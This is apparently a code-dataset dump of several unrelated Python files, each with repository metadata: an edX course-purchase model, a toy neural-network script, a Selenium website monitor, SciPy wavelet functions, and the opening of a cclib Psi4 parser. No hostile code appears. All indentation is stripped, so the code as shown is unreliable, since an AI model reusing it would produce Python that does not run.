class PaidCourseRegistration(OrderItem):
"""
This is an inventory item for paying for a course registration
"""
course_id = models.CharField(max_length=128, db_index=True)
mode = models.SlugField(default=CourseMode.DEFAULT_MODE_SLUG)
@classmethod
def contained_in_order(cls, order, course_id):
"""
Is the course defined by course_id contained in the order?
"""
return course_id in [item.paidcourseregistration.course_id
for item in order.orderitem_set.all().select_subclasses("paidcourseregistration")]
@classmethod
@transaction.commit_on_success
def add_to_order(cls, order, course_id, mode_slug=CourseMode.DEFAULT_MODE_SLUG, cost=None, currency=None):
"""
A standardized way to create these objects, with sensible defaults filled in.
Will update the cost if called on an order that already carries the course.
Returns the order item
"""
# First a bunch of sanity checks
try:
course = course_from_id(course_id) # actually fetch the course to make sure it exists, use this to
# throw errors if it doesn't
except ItemNotFoundError:
log.error("User {} tried to add non-existent course {} to cart id {}"
.format(order.user.email, course_id, order.id))
raise CourseDoesNotExistException
if cls.contained_in_order(order, course_id):
log.warning("User {} tried to add PaidCourseRegistration for course {}, already in cart id {}"
.format(order.user.email, course_id, order.id))
raise ItemAlreadyInCartException
if CourseEnrollment.is_enrolled(user=order.user, course_id=course_id):
log.warning("User {} trying to add course {} to cart id {}, already registered"
.format(order.user.email, course_id, order.id))
raise AlreadyEnrolledInCourseException
### Validations done, now proceed
### handle default arguments for mode_slug, cost, currency
course_mode = CourseMode.mode_for_course(course_id, mode_slug)
if not course_mode:
# user could have specified a mode that's not set, in that case return the DEFAULT_MODE
course_mode = CourseMode.DEFAULT_MODE
if not cost:
cost = course_mode.min_price
if not currency:
currency = course_mode.currency
super(PaidCourseRegistration, cls).add_to_order(order, course_id, cost, currency=currency)
item, created = cls.objects.get_or_create(order=order, user=order.user, course_id=course_id)
item.status = order.status
item.mode = course_mode.slug
item.qty = 1
item.unit_cost = cost
item.line_desc = 'Registration for Course: {0}'.format(course.display_name_with_default)
item.currency = currency
order.currency = currency
order.save()
item.save()
log.info("User {} added course registration {} to cart: order {}"
.format(order.user.email, course_id, order.id))
return item
def purchased_callback(self):
"""
When purchased, this should enroll the user in the course. We are assuming that
course settings for enrollment date are configured such that only if the (user.email, course_id) pair is found
in CourseEnrollmentAllowed will the user be allowed to enroll. Otherwise requiring payment
would in fact be quite silly since there's a clear back door.
"""
try:
course_loc = CourseDescriptor.id_to_location(self.course_id)
course_exists = modulestore().has_item(self.course_id, course_loc)
except ValueError:
raise PurchasedCallbackException(
"The customer purchased Course {0}, but that course doesn't exist!".format(self.course_id))
if not course_exists:
raise PurchasedCallbackException(
"The customer purchased Course {0}, but that course doesn't exist!".format(self.course_id))
CourseEnrollment.enroll(user=self.user, course_id=self.course_id, mode=self.mode)
log.info("Enrolled {0} in paid course {1}, paid ${2}"
.format(self.user.email, self.course_id, self.line_cost)) # pylint: disable=E1101
def generate_receipt_instructions(self):
"""
Generates instructions when the user has purchased a PaidCourseRegistration.
Basically tells the user to visit the dashboard to see their new classes
"""
notification = (_('Please visit your <a href="{dashboard_link}">dashboard</a> to see your new enrollments.')
.format(dashboard_link=reverse('dashboard')))
return self.pk_with_subclass, set([notification])
class CertificateItem(OrderItem):
"""
This is an inventory item for purchasing certificates
"""
course_id = models.CharField(max_length=128, db_index=True)
course_enrollment = models.ForeignKey(CourseEnrollment)
mode = models.SlugField()
@receiver(unenroll_done)
def refund_cert_callback(sender, course_enrollment=None, **kwargs):
"""
When a CourseEnrollment object calls its unenroll method, this function checks to see if that unenrollment
occurred in a verified certificate that was within the refund deadline. If so, it actually performs the
refund.
Returns the refunded certificate on a successful refund; else, it returns nothing.
"""
# Only refund verified cert unenrollments that are within bounds of the expiration date
if not course_enrollment.refundable():
return
target_certs = CertificateItem.objects.filter(course_id=course_enrollment.course_id, user_id=course_enrollment.user, status='purchased', mode='verified')
try:
target_cert = target_certs[0]
except IndexError:
log.error("Matching CertificateItem not found while trying to refund. User %s, Course %s", course_enrollment.user, course_enrollment.course_id)
return
target_cert.status = 'refunded'
target_cert.save()
order_number = target_cert.order_id
# send billing an email so they can handle refunding
subject = _("[Refund] User-Requested Refund")
message = "User {user} ({user_email}) has requested a refund on Order #{order_number}.".format(user=course_enrollment.user,
user_email=course_enrollment.user.email,
order_number=order_number)
to_email = [settings.PAYMENT_SUPPORT_EMAIL]
from_email = [settings.PAYMENT_SUPPORT_EMAIL]
try:
send_mail(subject, message, from_email, to_email, fail_silently=False)
except (smtplib.SMTPException, BotoServerError):
err_str = 'Failed sending email to billing request a refund for verified certiciate (User {user}, Course {course}, CourseEnrollmentID {ce_id}, Order #{order})'
log.error(err_str.format(
user=course_enrollment.user,
course=course_enrollment.course_id,
ce_id=course_enrollment.id,
order=order_number))
return target_cert
@classmethod
@transaction.commit_on_success
def add_to_order(cls, order, course_id, cost, mode, currency='usd'):
"""
Add a CertificateItem to an order
Returns the CertificateItem object after saving
`order` - an order that this item should be added to, generally the cart order
`course_id` - the course that we would like to purchase as a CertificateItem
`cost` - the amount the user will be paying for this CertificateItem
`mode` - the course mode that this certificate is going to be issued for
This item also creates a new enrollment if none exists for this user and this course.
Example Usage:
cart = Order.get_cart_for_user(user)
CertificateItem.add_to_order(cart, 'edX/Test101/2013_Fall', 30, 'verified')
"""
super(CertificateItem, cls).add_to_order(order, course_id, cost, currency=currency)
course_enrollment = CourseEnrollment.get_or_create_enrollment(order.user, course_id)
# do some validation on the enrollment mode
valid_modes = CourseMode.modes_for_course_dict(course_id)
if mode in valid_modes:
mode_info = valid_modes[mode]
else:
raise InvalidCartItem(_("Mode {mode} does not exist for {course_id}").format(mode=mode, course_id=course_id))
item, _created = cls.objects.get_or_create(
order=order,
user=order.user,
course_id=course_id,
course_enrollment=course_enrollment,
mode=mode
)
item.status = order.status
item.qty = 1
item.unit_cost = cost
course_name = course_from_id(course_id).display_name
item.line_desc = _("Certificate of Achievement, {mode_name} for course {course}").format(mode_name=mode_info.name,
course=course_name)
item.currency = currency
order.currency = currency
order.save()
item.save()
return item
def purchased_callback(self):
"""
When purchase goes through, activate and update the course enrollment for the correct mode
"""
try:
verification_attempt = SoftwareSecurePhotoVerification.active_for_user(self.course_enrollment.user)
verification_attempt.submit()
except Exception as e:
log.exception(
"Could not submit verification attempt for enrollment {}".format(self.course_enrollment)
)
self.course_enrollment.change_mode(self.mode)
self.course_enrollment.activate()
@property
def single_item_receipt_template(self):
if self.mode == 'verified':
return 'shoppingcart/verified_cert_receipt.html'
else:
return super(CertificateItem, self).single_item_receipt_template
@property
def single_item_receipt_context(self):
course = course_from_id(self.course_id)
return {
"course_id" : self.course_id,
"course_name": course.display_name_with_default,
"course_org": course.display_org_with_default,
"course_num": course.display_number_with_default,
"course_start_date_text": course.start_date_text,
"course_has_started": course.start > datetime.today().replace(tzinfo=pytz.utc),
}
@property
def additional_instruction_text(self):
return _("Note - you have up to 2 weeks into the course to unenroll from the Verified Certificate option "
"and receive a full refund. To receive your refund, contact {billing_email}. "
"Please include your order number in your e-mail. "
"Please do NOT include your credit card information.").format(
billing_email=settings.PAYMENT_SUPPORT_EMAIL)
|
TsinghuaX/edx-platform
|
lms/djangoapps/shoppingcart/models.py
|
Python
|
agpl-3.0
| 23,513
|
[
"VisIt"
] |
208305a8a810ed23a1f3e72c57f3fde9dbe5b59703924459e0844a919e008691
|
import numpy as np
import random
import json
import math
neuron_decay=0.9
maxneuronsperunit=64
maxaxonsperunit=128
maxunits=10
binary_io=True
bitsize=8
runtime=20
testsize=20
class neuron:
id=-1
myunit=-1
active=False
can_mutate=True
threshold=999
amount=0
decay=neuron_decay
downstream_axons=[]
upstream_axons=[]
def __init__(self,id,threshold):
self.id=id
self.threshold=threshold
def check(self):
global units
if self.amount>=self.threshold and self.active:
for x in self.downstream_axons:
if x>-1:
units[self.myunit].axons[x].fire()
self.amount=self.amount*self.decay
class axon:
id=-1
myunit=-1
active=False
fireamount=0
upstream_neuron=-1
downstream_neuron=-1
def __init__(self,id):
self.id=id
def fire(self):
global units
units[self.myunit].neurons[self.downstream_neuron].amount=units[self.myunit].neurons[self.downstream_neuron].amount+self.fireamount
#print "AXON "+str(self.id)+" IS FIRING WITH "+str(self.fireamount)
return True
class unit:
id=-1
active=False
active_neurons=0
active_axons=0
input_neurons=[]
output_neurons=[]
neurons=[neuron(i,999) for i in range(maxneuronsperunit)]
axons=[axon(i) for i in range(maxaxonsperunit)]
def __init__(self,id):
self.id=id
def add_neuron(self,threshold):
a=0
b=-1
while a<maxneuronsperunit:
if self.neurons[a].active==False:
b=a
self.active_neurons=self.active_neurons+1
a=maxneuronsperunit
a=a+1
self.neurons[b].active=True
self.neurons[b].myunit=self.id
self.neurons[b].threshold=threshold
return b
def add_n_neurons(self,n,threshold):
a=0
while a<n:
self.add_neuron(threshold)
a=a+1
def remove_neuron(self,n):
if self.neurons[n].active==True:
self.neurons[n].active=False
self.neurons[n].amount=0
self.neurons[n].threshold=999
self.active_neurons=self.active_neurons-1
def connect(self,a,b,amount):
if self.neurons[a].active and self.neurons[b].active:
c=0
d=0
while c<maxaxonsperunit:
if self.axons[c].active==False:
d=c
c=maxaxonsperunit
c=c+1
self.neurons[a].downstream_axons.append(d)
self.neurons[b].upstream_axons.append(d)
self.axons[d].active=True
self.axons[d].fireamount=amount
self.axons[d].myunit=self.id
self.axons[d].downstream_neuron=b
self.axons[d].upstream_neuron=a
return True
else:
return False
def cycle(self,inputs):
a=0
outputs=[]
#RESET ALL NEURONS BETWEEN CYCLES
for x in self.neurons:
x.amount=0
while a<runtime:
b=0
c=0
while c<len(self.input_neurons) and c<len(inputs):
self.neurons[self.input_neurons[c]].amount=inputs[c]
c=c+1
while b<maxneuronsperunit:
if self.neurons[b].active:
self.neurons[b].check()
b=b+1
#print "RUN CYCLE "+str(a)
a=a+1
def print_neurons(self):
a=0
while a<maxneuronsperunit:
if self.neurons[a].active:
print "NEURON "+str(a)+" AMT: "+str(self.neurons[a].amount)+" / "+str(self.neurons[a].threshold)
a=a+1
print "INPUTS"
for x in self.input_neurons:
print str(x)
print ""
print "OUTPUTS"
for y in self.output_neurons:
print str(y)
def designate_io(self,ins,outs):
a=0
b=0
while b<ins and a<maxneuronsperunit:
if self.neurons[a].active:
self.neurons[a].can_mutate=False
self.neurons[a].decay=1
if binary_io:
self.neurons[a].threshold=1 #IO are BINARY
self.input_neurons.append(a)
b=b+1
a=a+1
c=0
d=a
while c<outs and d<maxneuronsperunit:
if self.neurons[d].active:
self.neurons[d].can_mutate=False
self.neurons[d].decay=1
if binary_io:
self.neurons[d].threshold=1
self.output_neurons.append(d)
c=c+1
d=d+1
if c==ins and b==outs:
return True
else:
return False
def remove_axon(self,n):
if self.axons[n].active:
self.axons[n].active=False
self.axons[n].id=-1
self.axons[n].fireamount=0
u=self.axons[n].upstream_neuron
d=self.axons[n].downstream_neuron
self.axons[n].upstream_neuron=-1
self.axons[n].downstream_neuron=-1
if self.neurons[u].active:
a=0
while a<len(self.neurons[u].downstream_axons):
if self.neurons[u].downstream_axons[a]==n:
self.neurons[u].downstream_axons[a]=-1
a=a+1
if self.neurons[d].active:
b=0
while b<len(self.neurons[d].upstream_axons):
if self.neurons[d].upstream_axons[b]==n:
self.neurons[d].upstream_axons[b]=-1
b=b+1
def change_axon_destination(self,a,d):
if self.axons[a].active:
b=self.axons[a].downstream_neuron
h=0
while h<len(self.neurons[b].upstream_axons):
if self.neurons[b].upstream_axons[h]==a:
self.neurons[b].upstream_axons[h]=-1
h=h+1
self.neurons[b].upstream_axons.append(a)
self.axons[a].downstream_neuron=d
def change_axon_source(self,a,s):
if self.axons[a].active:
b=self.axons[a].upstream_neuron
h=0
while h<len(self.neurons[b].downstream_axons):
if self.neurons[b].downstream_axons[h]==a:
self.neurons[b].downstream_axons[h]=-1
h=h+1
self.axons[a].upstream_neuron=s
self.neurons[b].downstream_axons.append(a)
def change_threshold(self,n,r):
if self.neurons[n].active:
self.neurons[n].threshold=r
return True
else:
return False
def change_fireamount(self,a,r):
if self.axons[a].active:
self.axons[a].fireamount=r
return True
else:
return False
def change_decay(self,n,r):
if self.neurons[n].active:
self.neurons[n].decay=r
return True
else:
return False
def mutate(self):
choice=random.randint(0,100)
#print choice
if choice<10: #add neuron
self.add_neuron(1)
elif choice<20: # remove neuron
ok=True
found=False
a=0
while ok:
if self.neurons[a].active:
ok=False
found=True
elif a==maxneuronsperunit:
ok=False
a=a+1
if found:
self.remove_neuron(a)
#print "removed "+str(a)
elif choice<30: #add connection
ok=True
fireamount=random.randint(0,4)
fro=-1
to=-1
a=0
while ok and a<maxneuronsperunit:
f=random.randint(0,maxneuronsperunit-1)
if self.neurons[f].active:
fro=f
ok=False
a=a+1
ok=True
b=0
while ok and b<maxneuronsperunit:
t=random.randint(0,maxneuronsperunit-1)
if self.neurons[t].active:
to=t
ok=False
b=b+1
if to>-1 and fro > -1:
self.connect(fro,to,fireamount)
#print "connected "+str(fro)+" to "+str(to)+" for "+str(fireamount)
elif choice<40: #remove connection
ok=True
a=0
while ok:
h=random.randint(0,maxaxonsperunit-1)
if self.axons[h].active:
ok=False
#self.remove_axon(h)
# print "removed "+str(a)
a=a+1
if a>1000:
ok=False
elif choice<50: #change threshold WORKS
ok=True
changeamt=(random.random()-0.5)*2
while ok:
a=random.randint(0,maxneuronsperunit-1)
if self.neurons[a].active:
self.neurons[a].threshold=self.neurons[a].threshold+changeamt
# print "changed threshold for "+str(a)+ " by "+str(changeamt)
ok=False
a=a+1
elif choice<60: #change fireamount
ok=True
a=0
while ok and a<len(self.axons):
changeamt=(random.randint(-5,5))/10
if self.axons[a].active:
ok=False
self.axons[a].fireamount=self.axons[a].fireamount+changeamt
# print "changed fireamount "+str(a)+" by "+str(changeamt)
a=a+1
elif choice<70: # change axon source
a=0
b=0
kk=True
while kk:
towhere=random.randint(0,maxneuronsperunit-1)
if self.neurons[towhere].active:
kk=False
b=b+1
if b>100:
kk=False
ok=True
if b>100:
ok=False
while ok and a<len(self.axons):
if self.axons[a].active:
self.change_axon_source(a,towhere)
# print "changed axon source to "+str(towhere)+" for "+str(a)
ok=False
a=a+1
elif choice<80: # change axon destination
a=0
b=0
kk=True
while kk:
towhere=random.randint(0,maxneuronsperunit-1)
if self.neurons[towhere].active:
kk=False
b=b+1
if b>100:
kk=False
ok=True
if b>100:
ok=False
while ok and a<len(self.axons):
if self.axons[a].active:
self.change_axon_destination(a,towhere)
# print "changed axon destination to "+str(towhere)+" for "+str(a)
ok=False
a=a+1
elif choice<90: # change decay
ok=True
a=0
changeamt=(random.random()-0.5)
while ok and a<maxneuronsperunit:
if self.neurons[a].active:
self.neurons[a].decay=self.neurons[a].decay+changeamt
# print "changed decay for "+str(a)+ " by "+str(changeamt)
ok=False
a=a+1
def mutate_n(self,n):
a=0
while a<n:
self.mutate()
a=a+1
def read_outputs(self):
#OUTPUTS IN BINARY
outputs=[]
a=0
while a<len(self.output_neurons):
n=self.output_neurons[a]
if self.neurons[n].active and self.neurons[n].amount>=self.neurons[n].threshold:
outputs.append(1)
else:
outputs.append(0)
a=a+1
return outputs
def read_inputs(self):
inputs=[]
a=0
while a<len(self.input_neurons):
n=self.input_neurons[a]
if self.neurons[n].active:
inputs.append(self.neurons[n].amount)
else:
inputs.append(0)
a=a+1
return inputs
class system:
units=[unit(i) for i in range(maxunits)]
def init(self, n_units):
for i in range(0,n_units):
self.units[i].add_n_neurons(maxneuronsperunit,1)
self.units[i].designate_io(bitsize*2,bitsize)
self.units[i].active=True
def save(self):
global data
a=0
data=[] #each element is a unit
while a<maxunits:
if self.units[a].active:
r={'active_neurons':self.units[a].active_neurons,'active_axons':self.units[a].active_axons,'input_neurons':self.units[a].input_neurons,'output_neurons':self.units[a].output_neurons}
r['neurons']=[]
r['unitid']=a
#save neuron data in each active unit
b=0
while b<maxneuronsperunit:
if self.units[a].neurons[b].active:
d={'can_mutate':self.units[a].neurons[b].can_mutate,'threshold':self.units[a].neurons[b].threshold,'currentamount':self.units[a].neurons[b].amount,'decay':self.units[a].neurons[b].decay}
d['downstream_axons']=self.units[a].neurons[b].downstream_axons
d['upstream_axons']=self.units[a].neurons[b].upstream_axons
d['neuronid']=b
r['neurons'].append(d)
b=b+1
b=0
r['axons']=[]
while b<maxaxonsperunit:
if self.units[a].axons[b].active:
g={'fire_amount':self.units[a].axons[b].fireamount,'axonid':b,'upstream_neuron':self.units[a].axons[b].upstream_neuron,'downstream_neuron':self.units[a].axons[b].downstream_neuron}
r['axons'].append(g)
b=b+1
data.append(r)
a=a+1
v=json.dumps(data)
file=open('config.txt','wb')
file.write(v)
file.close()
def load(self):
global data,units
file=open('config.txt')
f=file.read()
data=json.loads(f)
a=0
while a<len(data):
r=data[a]['unitid']
self.units[r].active_axons=data[a]['active_axons']
self.units[r].active_neurons=data[a]['active_neurons']
self.units[r].input_neurons=data[a]['input_neurons']
self.units[r].output_neurons=data[a]['output_neurons']
#load neuron data
n=0
while n<len(data[a]['neurons']):
neuronid=data[a]['neurons'][n]['neuronid']
self.units[r].neurons[neuronid].threshold=data[a]['neurons'][n]['threshold']
self.units[r].neurons[neuronid].can_mutate=data[a]['neurons'][n]['can_mutate']
self.units[r].neurons[neuronid].amount=data[a]['neurons'][n]['currentamount']
self.units[r].neurons[neuronid].decay=data[a]['neurons'][n]['decay']
self.units[r].neurons[neuronid].downstream_axons=data[a]['neurons'][n]['downstream_axons']
self.units[r].neurons[neuronid].upstream_axons=data[a]['neurons'][n]['upstream_axons']
self.units[r].neurons[neuronid].active=True
n=n+1
#load axon data
g=0
while g<len(data[a]['axons']):
axon=data[a]['axons'][g]
axonid=axon['axonid']
self.units[r].axons[axonid].fire_amount=axon['fire_amount']
self.units[r].axons[axonid].upstream_neuron=axon['upstream_neuron']
self.units[r].axons[axonid].downstream_neuron=axon['downstream_neuron']
self.units[r].axons[axonid].active=True
g=g+1
a=a+1
|
barisser/Neural
|
neural.py
|
Python
|
mit
| 16,325
|
[
"NEURON"
] |
52c2ada4f94488c441e6036dd6b15bbdf542ec02b4c1fdb4a7a0ea605a41b87a
|
#!/usr/bin/python
__author__ = 'mattdevs'
import os
import logging
import threading
from datetime import datetime
import requests
from requests import ConnectionError
from selenium import webdriver
from apscheduler.scheduler import Scheduler, EVENT_JOB_EXECUTED, EVENT_JOB_ERROR
import shepherd_util
LOG_FILE = "shepherd.out"
SCREENSHOT_DIR = "screenshots"
SCREENSHOT_INTERVAL_MINS = 1
class Shepherd:
def __init__(self):
self.driver = webdriver.Chrome()
def takeScreenshot(self, siteURL):
""" Take a screenshot of the specified site and store it. """
logging.info("Taking a screenshot of %s" % siteURL)
siteDir = siteURL.replace("http://", "")
self.driver.get(siteURL)
if not os.path.exists("%s/%s" % (SCREENSHOT_DIR, siteDir)):
logging.info("Screenshot directory did not exist, creating %s" % siteURL)
os.makedirs("%s/%s" % (SCREENSHOT_DIR, siteDir))
if not self.driver.save_screenshot(
"%s/%s/%s.png" % (SCREENSHOT_DIR, siteDir, datetime.now().strftime("%Y-%m-%d %H.%M.%S"))):
logging.error("Unable to take screenshot for %s" % siteURL)
def verifySiteIsOnline(self, siteURL):
""" Issue an HTTP request to the specified url and verify that it succeeds. """
logging.info("Verifying that %s is online." % siteURL)
try:
result = requests.get(siteURL)
except ConnectionError as conErr:
logging.exception("Unable to reach %s: %s" % (siteURL, conErr))
raise
if result.status_code != 200:
logging.error("Unable to reach %s, response code: %s" % (siteURL, result.status_code))
logging.info("Site %s is online." % siteURL)
def visitAndVerifySites(self):
""" Visit all sites and verify their status. """
siteList = shepherd_util.unpackSites()
try:
for site in siteList:
self.verifySiteIsOnline(site)
self.takeScreenshot(site)
finally:
logging.info("Closing all browser windows and shutting down.")
self.driver.quit()
def eventListener(self, event):
""" Listener that can be attached to scheduler to monitor event execution. """
if event.exception:
logging.warning("Encountered exception during event processing: %s" % event.exception)
if __name__ == "__main__":
shepherd_util.setupLogging(LOG_FILE)
logging.info("Initializing scheduler.")
sched = Scheduler(daemon=True)
sched.start()
shepherd = Shepherd()
logging.info("Adding shepherd function to scheduler to run once per hour.")
sched.add_listener(shepherd.eventListener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)
sched.add_interval_job(shepherd.visitAndVerifySites, minutes=SCREENSHOT_INTERVAL_MINS)
while True:
pass
|
mattdevs/site-shepherd
|
shepherd.py
|
Python
|
gpl-2.0
| 2,875
|
[
"VisIt"
] |
41e4b8b4330108f54d54a9751df3414f44114ca17c300973780ac5481414db1d
|
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.dual import eig
from scipy.misc import comb
from scipy import linspace, pi, exp
from scipy.signal import convolve
__all__ = ['daub', 'qmf', 'cascade', 'morlet', 'ricker', 'cwt']
def daub(p):
"""
The coefficients for the FIR low-pass filter producing Daubechies wavelets.
p>=1 gives the order of the zero at f=1/2.
There are 2p filter coefficients.
Parameters
----------
p : int
Order of the zero at f=1/2, can have values from 1 to 34.
Returns
-------
daub : ndarray
Return
"""
sqrt = np.sqrt
if p < 1:
raise ValueError("p must be at least 1.")
if p == 1:
c = 1 / sqrt(2)
return np.array([c, c])
elif p == 2:
f = sqrt(2) / 8
c = sqrt(3)
return f * np.array([1 + c, 3 + c, 3 - c, 1 - c])
elif p == 3:
tmp = 12 * sqrt(10)
z1 = 1.5 + sqrt(15 + tmp) / 6 - 1j * (sqrt(15) + sqrt(tmp - 15)) / 6
z1c = np.conj(z1)
f = sqrt(2) / 8
d0 = np.real((1 - z1) * (1 - z1c))
a0 = np.real(z1 * z1c)
a1 = 2 * np.real(z1)
return f / d0 * np.array([a0, 3 * a0 - a1, 3 * a0 - 3 * a1 + 1,
a0 - 3 * a1 + 3, 3 - a1, 1])
elif p < 35:
# construct polynomial and factor it
if p < 35:
P = [comb(p - 1 + k, k, exact=1) for k in range(p)][::-1]
yj = np.roots(P)
else: # try different polynomial --- needs work
P = [comb(p - 1 + k, k, exact=1) / 4.0**k
for k in range(p)][::-1]
yj = np.roots(P) / 4
# for each root, compute two z roots, select the one with |z|>1
# Build up final polynomial
c = np.poly1d([1, 1])**p
q = np.poly1d([1])
for k in range(p - 1):
yval = yj[k]
part = 2 * sqrt(yval * (yval - 1))
const = 1 - 2 * yval
z1 = const + part
if (abs(z1)) < 1:
z1 = const - part
q = q * [1, -z1]
q = c * np.real(q)
# Normalize result
q = q / np.sum(q) * sqrt(2)
return q.c[::-1]
else:
raise ValueError("Polynomial factorization does not work "
"well for p too large.")
def qmf(hk):
"""
Return high-pass qmf filter from low-pass
Parameters
----------
hk : array_like
Coefficients of high-pass filter.
"""
N = len(hk) - 1
asgn = [{0: 1, 1:-1}[k % 2] for k in range(N + 1)]
return hk[::-1] * np.array(asgn)
def wavedec(amn, hk):
gk = qmf(hk)
return NotImplemented
def cascade(hk, J=7):
"""
Return (x, phi, psi) at dyadic points ``K/2**J`` from filter coefficients.
Parameters
----------
hk : array_like
Coefficients of low-pass filter.
J : int, optional
Values will be computed at grid points ``K/2**J``. Default is 7.
Returns
-------
x : ndarray
The dyadic points ``K/2**J`` for ``K=0...N * (2**J)-1`` where
``len(hk) = len(gk) = N+1``.
phi : ndarray
The scaling function ``phi(x)`` at `x`:
``phi(x) = sum(hk * phi(2x-k))``, where k is from 0 to N.
psi : ndarray, optional
The wavelet function ``psi(x)`` at `x`:
``phi(x) = sum(gk * phi(2x-k))``, where k is from 0 to N.
`psi` is only returned if `gk` is not None.
Notes
-----
The algorithm uses the vector cascade algorithm described by Strang and
Nguyen in "Wavelets and Filter Banks". It builds a dictionary of values
and slices for quick reuse. Then inserts vectors into final vector at the
end.
"""
N = len(hk) - 1
if (J > 30 - np.log2(N + 1)):
raise ValueError("Too many levels.")
if (J < 1):
raise ValueError("Too few levels.")
# construct matrices needed
nn, kk = np.ogrid[:N, :N]
s2 = np.sqrt(2)
# append a zero so that take works
thk = np.r_[hk, 0]
gk = qmf(hk)
tgk = np.r_[gk, 0]
indx1 = np.clip(2 * nn - kk, -1, N + 1)
indx2 = np.clip(2 * nn - kk + 1, -1, N + 1)
m = np.zeros((2, 2, N, N), 'd')
m[0, 0] = np.take(thk, indx1, 0)
m[0, 1] = np.take(thk, indx2, 0)
m[1, 0] = np.take(tgk, indx1, 0)
m[1, 1] = np.take(tgk, indx2, 0)
m *= s2
# construct the grid of points
x = np.arange(0, N * (1 << J), dtype=np.float) / (1 << J)
phi = 0 * x
psi = 0 * x
# find phi0, and phi1
lam, v = eig(m[0, 0])
ind = np.argmin(np.absolute(lam - 1))
# a dictionary with a binary representation of the
# evaluation points x < 1 -- i.e. position is 0.xxxx
v = np.real(v[:, ind])
# need scaling function to integrate to 1 so find
# eigenvector normalized to sum(v,axis=0)=1
sm = np.sum(v)
if sm < 0: # need scaling function to integrate to 1
v = -v
sm = -sm
bitdic = {}
bitdic['0'] = v / sm
bitdic['1'] = np.dot(m[0, 1], bitdic['0'])
step = 1 << J
phi[::step] = bitdic['0']
phi[(1 << (J - 1))::step] = bitdic['1']
psi[::step] = np.dot(m[1, 0], bitdic['0'])
psi[(1 << (J - 1))::step] = np.dot(m[1, 1], bitdic['0'])
# descend down the levels inserting more and more values
# into bitdic -- store the values in the correct location once we
# have computed them -- stored in the dictionary
# for quicker use later.
prevkeys = ['1']
for level in range(2, J + 1):
newkeys = ['%d%s' % (xx, yy) for xx in [0, 1] for yy in prevkeys]
fac = 1 << (J - level)
for key in newkeys:
# convert key to number
num = 0
for pos in range(level):
if key[pos] == '1':
num += (1 << (level - 1 - pos))
pastphi = bitdic[key[1:]]
ii = int(key[0])
temp = np.dot(m[0, ii], pastphi)
bitdic[key] = temp
phi[num * fac::step] = temp
psi[num * fac::step] = np.dot(m[1, ii], pastphi)
prevkeys = newkeys
return x, phi, psi
def morlet(M, w=5.0, s=1.0, complete=True):
"""
Complex Morlet wavelet.
Parameters
----------
M : int
Length of the wavelet.
w : float
Omega0. Default is 5
s : float
Scaling factor, windowed from ``-s*2*pi`` to ``+s*2*pi``. Default is 1.
complete : bool
Whether to use the complete or the standard version.
Returns
-------
morlet : (M,) ndarray
See Also
--------
scipy.signal.gausspulse
Notes
-----
The standard version::
pi**-0.25 * exp(1j*w*x) * exp(-0.5*(x**2))
This commonly used wavelet is often referred to simply as the
Morlet wavelet. Note that this simplified version can cause
admissibility problems at low values of w.
The complete version::
pi**-0.25 * (exp(1j*w*x) - exp(-0.5*(w**2))) * exp(-0.5*(x**2))
The complete version of the Morlet wavelet, with a correction
term to improve admissibility. For w greater than 5, the
correction term is negligible.
Note that the energy of the return wavelet is not normalised
according to s.
The fundamental frequency of this wavelet in Hz is given
by ``f = 2*s*w*r / M`` where r is the sampling rate.
"""
x = linspace(-s * 2 * pi, s * 2 * pi, M)
output = exp(1j * w * x)
if complete:
output -= exp(-0.5 * (w**2))
output *= exp(-0.5 * (x**2)) * pi**(-0.25)
return output
def ricker(points, a):
"""
Return a Ricker wavelet, also known as the "Mexican hat wavelet".
It models the function:
``A (1 - x^2/a^2) exp(-x^2/2 a^2)``,
where ``A = 2/sqrt(3a)pi^1/3``.
Parameters
----------
points : int
Number of points in `vector`.
Will be centered around 0.
a : scalar
Width parameter of the wavelet.
Returns
-------
vector : (N,) ndarray
Array of length `points` in shape of ricker curve.
Examples
--------
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
>>> points = 100
>>> a = 4.0
>>> vec2 = signal.ricker(points, a)
>>> print(len(vec2))
100
>>> plt.plot(vec2)
>>> plt.show()
"""
A = 2 / (np.sqrt(3 * a) * (np.pi**0.25))
wsq = a**2
vec = np.arange(0, points) - (points - 1.0) / 2
xsq = vec**2
mod = (1 - xsq / wsq)
gauss = np.exp(-xsq / (2 * wsq))
total = A * mod * gauss
return total
def cwt(data, wavelet, widths):
"""
Continuous wavelet transform.
Performs a continuous wavelet transform on `data`,
using the `wavelet` function. A CWT performs a convolution
with `data` using the `wavelet` function, which is characterized
by a width parameter and length parameter.
Parameters
----------
data : (N,) ndarray
data on which to perform the transform.
wavelet : function
Wavelet function, which should take 2 arguments.
The first argument is the number of points that the returned vector
will have (len(wavelet(width,length)) == length).
The second is a width parameter, defining the size of the wavelet
(e.g. standard deviation of a gaussian). See `ricker`, which
satisfies these requirements.
widths : (M,) sequence
Widths to use for transform.
Returns
-------
cwt: (M, N) ndarray
Will have shape of (len(data), len(widths)).
Notes
-----
>>> length = min(10 * width[ii], len(data))
>>> cwt[ii,:] = scipy.signal.convolve(data, wavelet(length,
... width[ii]), mode='same')
Examples
--------
>>> from scipy import signal
>>> sig = np.random.rand(20) - 0.5
>>> wavelet = signal.ricker
>>> widths = np.arange(1, 11)
>>> cwtmatr = signal.cwt(sig, wavelet, widths)
"""
output = np.zeros([len(widths), len(data)])
for ind, width in enumerate(widths):
wavelet_data = wavelet(min(10 * width, len(data)), width)
output[ind, :] = convolve(data, wavelet_data,
mode='same')
return output
|
juliantaylor/scipy
|
scipy/signal/wavelets.py
|
Python
|
bsd-3-clause
| 10,246
|
[
"Gaussian"
] |
b34f3ab40d5335cbaf2a2a9343601e8f01af0b685137d9dd8a30089b79b5a7fd
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Parser for Psi4 output files."""
from collections import namedtuple
import numpy
from cclib.parser import data
from cclib.parser import logfileparser
from cclib.parser import utils
class Psi4(logfileparser.Logfile):
"""A Psi4 log file."""
def __init__(self, *args, **kwargs):
super().__init__(logname="Psi4", *args, **kwargs)
def __str__(self):
"""Return a string representation of the object."""
return "Psi4 log file %s" % (self.filename)
def __repr__(self):
"""Return a representation of the object."""
return 'Psi4("%s")' % (self.filename)
def before_parsing(self):
# Early beta versions of Psi4 normalize basis function
# coefficients when printing.
self.version_4_beta = False
# This is just used to track which part of the output we are in, with
